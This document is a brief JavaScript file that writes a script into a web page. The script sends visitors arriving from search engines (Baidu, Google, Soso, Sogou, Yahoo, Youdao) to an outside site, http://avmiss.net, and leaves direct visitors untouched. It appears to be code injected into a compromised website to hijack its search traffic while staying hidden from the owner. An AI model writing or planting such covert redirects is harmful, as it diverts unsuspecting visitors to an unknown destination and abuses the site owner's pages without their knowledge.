document.writeln("");
document.writeln("<script>");
document.writeln("var reff = document.referrer;");
document.writeln("if(reff.indexOf(\"baidu.com\")>0 || reff.indexOf(\"google.com\")>0  || reff.indexOf(\"soso.com\")>0  || reff.indexOf(\"sogou.com\")>0  || reff.indexOf(\"yahoo.com\")>0  || reff.indexOf(\"youdao.com\")>0)");
document.writeln("{");
document.writeln("   document.location.href=\" http://avmiss.net\";");
document.writeln("}");
document.writeln("</script>");
